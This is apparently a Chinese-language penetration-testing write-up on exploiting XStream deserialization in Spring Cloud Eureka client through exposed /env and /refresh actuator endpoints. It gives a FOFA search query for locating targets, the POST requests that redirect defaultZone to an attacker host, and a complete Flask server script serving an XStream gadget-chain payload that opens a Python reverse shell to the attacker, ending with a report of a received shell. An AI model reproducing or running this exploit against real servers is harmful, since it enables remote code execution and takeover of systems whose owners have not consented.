一、漏洞成因
spring-cloud-starter-netflix-eureka-client組件使用 Xstream 序列化功能,在一定條件下觸發REC。
(XStream:XStream是Java類庫,用來將對象序列化成XML (JSON)或反序列化為對象。)
二、利用條件
eureka-client < 1.8.7
env/refresh 接口暴露
spring boot 版本范圍未知(未找到相關版本研究文章)
三、漏洞確認
env接口暴露,找到包含相關漏洞組件
本地環境搭建的和參考文章環境不太一樣,復現過程無法實現。
四、漏洞復現
fofa app="Eureka-Server"
1. 訪問env接口,搜索 Eureka 確認使用該組件
2. 修改post請求 ,使用dnslog驗證是否可以出網
Content-Type: application/x-www-form-urlencoded
eureka.client.serviceUrl.defaultZone=http://xxx.bjohry.dnslog.cn
3.refresh 接口刷新
Content-Type: application/x-www-form-urlencoded
4.修改python腳本,最下面的那個是自己啟的web端口,中間那個是反彈接收shell的端口
#!/usr/bin/env python # coding: utf-8 # -**- Author: LandGrey -**- from flask import Flask, Response app = Flask(__name__) @app.route('/', defaults={'path': ''}) @app.route('/<path:path>', methods=['GET', 'POST']) def catch_all(path): xml = """<linked-hash-set> <jdk.nashorn.internal.objects.NativeString> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/bin/bash</string> <string>-c</string> <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("****",8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> </is> </dataSource> </dataHandler> </value> </jdk.nashorn.internal.objects.NativeString> </linked-hash-set>""" return Response(xml, mimetype='application/xml') if __name__ == "__main__": app.run(host='0.0.0.0', port=8081)
啟動之后訪問是這樣的,xml里python反彈shell的命令
5.重新更新到地址,后直接刷新接口refresh
eureka.client.serviceUrl.defaultZone=http://***:8080/xstream
6.下面的是python腳本運行后的,靶機會不斷往回請求
成功接收到shell 並執行命令
參考鏈接:
https://www.jianshu.com/p/91a5ca9b7c1c
https://github.com/LandGrey/SpringBootVulExploit
https://www.freebuf.com/column/234719.html
https://blog.csdn.net/blueheart20/article/details/72827666 //雲服務器安裝python3無pip解決方法